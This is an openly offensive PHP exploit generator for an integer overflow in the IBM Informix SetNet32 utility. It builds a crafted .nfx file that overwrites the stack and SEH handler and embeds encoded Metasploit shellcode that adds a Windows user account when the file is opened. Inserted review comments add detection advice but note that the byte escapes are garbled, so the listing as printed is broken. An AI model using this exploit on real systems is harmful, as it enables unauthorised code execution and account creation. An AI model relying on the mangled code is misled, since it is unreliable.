
9sg_ibm_setnet32.txt

Posted on 06 October 2009

<?php
/*
IBM Informix Client SDK 3.0 SetNet32 File (.nfx) Hostsize integer overflow exploit (2k3 sp0)
by Nine:Situations:Group::bruiser
site: http://retrogod.altervista.org/
vulnerable packages: IBM Informix Client SDK 3.0, IBM Informix Connect Runtime 3.x,
possibly other products carrying the setnet32 utility.
User-supplied value for the Hostsize field results in an integer overflow and subsequently
a complete stack smash by passing an overlong string to the HostList one allowing an
attacker to execute arbitrary code.
All modules in memory are compiled with /SAFESEH=on but it's still possible to execute
arbitrary code by passing a certain trusted handler from kernel32.dll.
We fall in a more convenient condition with eip overwritten: now ebp register points to
a portion of our buffer. So this is context-dependent, try against another OS.
Other attacks are possible through the ProtoSize or ServerSize fields.
It works by double clicking on the resulting .nfx file.
*/
/*
Review notes (defender perspective, limited to what this listing shows):
 - This script is a file generator only: it assembles an INI-style SetNet32
   configuration in $____boom and writes it to 9sg.nfx in the working
   directory. It performs no network activity itself; the trigger described
   by the author is a user opening the resulting file with the vulnerable tool.
 - The declared HostSize (1517) is smaller than the HostList data actually
   emitted: a 312-byte pad, a 1115-byte payload region, and several trailing
   4-byte records (assuming the intended one-byte escapes). That declared-size
   versus actual-length mismatch is the condition the header comment attributes
   the overflow to.
 - Detection/mitigation: treat .nfx files from untrusted sources as hostile
   input. A SetNet32 file whose [Size] values disagree with the real list
   lengths, or whose HostList holds long runs of repeated/non-printable bytes,
   is a reasonable thing to alert on. Apply the vendor fix for the affected
   Client SDK versions where one is available.
 - NOTE(review): escape sequences in this copy appear extraction-garbled
   (e.g. "x90" rather than a byte escape), so the literals as printed do not
   yield the bytes the inline comments describe; read this as an illustrative
   listing, not a verified artifact.
*/
# windows/adduser - 436 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=sun, PASS=tzu
// Encoded payload as described by the generator banner above; it is opaque to
// this script and is only concatenated into the HostList field below.
$_scode= "x89xe1xd9xc2xd9x71xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x45x50" .
"x43x30x4cx4bx50x45x47x4cx4cx4bx43x4cx45x55" .
"x43x48x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4b" .
"x51x4fx47x50x45x51x4ax4bx47x39x4cx4bx46x54" .
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" .
"x4dx54x49x50x44x34x44x47x49x51x49x5ax44x4d" .
"x45x51x48x42x4ax4bx4bx44x47x4bx51x44x47x54" .
"x44x44x44x35x4bx55x4cx4bx51x4fx47x54x45x51" .
"x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx45x51" .
"x4ax4bx4cx49x51x4cx47x54x45x54x48x43x51x4f" .
"x46x51x4cx36x43x50x46x36x42x44x4cx4bx51x56" .
"x50x30x4cx4bx47x30x44x4cx4cx4bx44x30x45x4c" .
"x4ex4dx4cx4bx45x38x44x48x4bx39x4ax58x4cx43" .
"x49x50x43x5ax50x50x43x58x4cx30x4dx5ax45x54" .
"x51x4fx45x38x4dx48x4bx4ex4dx5ax44x4ex51x47" .
"x4bx4fx4dx37x45x33x42x4dx45x34x46x4ex45x35" .
"x44x38x43x55x51x30x46x4fx45x33x47x50x42x4e" .
"x42x45x43x44x47x50x44x35x42x53x43x55x42x52" .
"x47x50x43x43x43x45x42x4ex51x30x43x44x43x4a" .
"x43x45x51x30x46x4fx51x51x47x34x47x34x51x30" .
"x46x46x47x56x47x50x42x4ex45x35x43x44x51x30" .
"x42x4cx42x4fx43x53x43x51x42x4cx42x47x42x52" .
"x42x4fx42x55x42x50x51x30x51x51x45x34x42x4d" .
"x43x59x42x4ex45x39x43x43x42x54x43x42x43x51" .
"x43x44x42x4fx44x32x42x53x47x50x42x53x44x35" .
"x42x4ex47x50x46x4fx47x31x50x44x47x34x45x50" .
"x41x41";
// The .nfx body: [Setnet32], [ENVIRONMENT], [Size] and [Lists] sections followed
// by per-server/per-host records, ending in what is intended as a NUL byte.
// Only the [Size]/HostList pair is attacker-controlled in an interesting way;
// the remaining keys mirror an ordinary SetNet32 configuration.
$____boom = "[Setnet32] ".
"Format=x203.00x203.00.TC1x20x20 ".
"[ENVIRONMENT] ".
"CC8BITLEVEL= ".
"CLIENT_LOCALE=EN_US.8859-1 ".
"COLLCHAR= ".
"CONRETRY= ".
"CONTIME= ".
"DB2CLI= ".
"DBANSIWARN= ".
"DBDATE= ".
"DBLANG=EN_US.CP1252 ".
"DBMONEY= ".
"DBNLS= ".
"DBPATH= ".
"DBTEMP= ".
"DBTIME= ".
"DELIMIDENT=n ".
"ESQLMF= ".
"FET_BUF_SIZE= ".
"BIG_FET_BUF_SIZE= ".
"IFX_MULTIPREPSTMT= ".
"GL_DATE= ".
"GL_DATETIME= ".
"IFX_EXTDIRECTIVES= ".
"IFX_XASTDCOMPLIANCE_XAEND= ".
"IFX_DIRTY_WAIT= ".
"INFORMIXDIR=C:Programx20FilesIBMInformixConnect\r ".
"INFORMIXSERVER=aaaaaaaaaaaa ".
"INFORMIXSQLHOSTS= ".
"LANG= ".
"LC_COLLATE= ".
"LC_CTYPE= ".
"LC_MONETARY= ".
"LC_NUMERIC= ".
"LC_TIME= ".
"DBALSBC= ".
"DBAPICODE= ".
"DBASCIIBC= ".
"DBCENTURY= ".
"DBCODESET= ".
"DBCONNECT= ".
"DBCSCONV= ".
"DBCSOVERRIDE= ".
"DBCSWIDTH= ".
"DBFLTMSK= ".
"DBMONEYSCALE= ".
"DBSS2= ".
"DBSS3= ".
"IFX_AUTOFREE= ".
"IFX_DEFERRED_PREPARE= ".
"NODEFDAC= ".
"OPTMSG= ".
"OPTOFC= ".
"IFX_USE_PREC_16= ".
"IFX_PAD_VARCHAR= ".
"NOZEROMDY= ".
"BLANK_STRINGS_NOT_NULL= ".
"IFX_FLAT_UCSQ= ".
"[Size] ".
"CLIENT_LOCALE=12 ".
"DB_LOCALE=0 ".
"NumOfHosts=999 ".
"NumOfServers=1 ".
"NumOfProtocols=9 ".
"ServerSize=16 ".
// Declared size for each HostList entry; the data appended to HostList below
// is considerably longer than this value.
"HostSize=1517 ". //boom!!
"ProtoSize=16 ".
"[Lists] ".
"INFORMIXSERVERLIST=aaaa; ".
"HostList=".
str_repeat("x90",312).
$_scode.
str_repeat("x90",1115 - strlen($_scode)).
"xe9x01xfbxffxff". //jmp back to shellcode
"x90x90x90x90". //junk, this is overwritten in some way
"x87x35xe4x77". //pointer to the next SEH record
"x87x35xe4x77". //SE handler, a registered one from kernel32.dll
"xC0xF0x03xF1". //do not touch
"x41x41x41x41". //do not touch
"x9bx71xd8x77". //call ebp, user32.dll and further jno short
str_repeat("x9bx71xd8x77",64). //do not touch
"; ".
"PROTOCOLLIST=olsoctcp;onsoctcp;olsocspx;onsocspx;sesoctcp;sesocspx;seipcpip;olipcnmp;onipcnmp; ".
"[__infx_sqlhost_aaaaaaaaaaaaaaa] ".
"HOST= ".
"SERVICE=1527 ".
"PROTOCOL=olsoctcp ".
"OPTIONS= ".
"[__infx_host_192.168.0.1] ".
"USER=informix ".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20".
"x200x20x200x20x200x20x200x20x200 ".
"AskPassword=P ".
"[__infx_host_192.168.0.2] ".
"USER=aaaa ".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x2049x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200 ".
"AskPassword=P ".
"[__infx_host_192.168.0.3] ".
"USER=informix ".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200 ".
"AskPassword=P ".
"x00";
// Writes the crafted configuration to the current working directory. The
// return value (false on failure) is not checked, so a write error is silent.
file_put_contents("9sg.nfx",$____boom);
?>

 
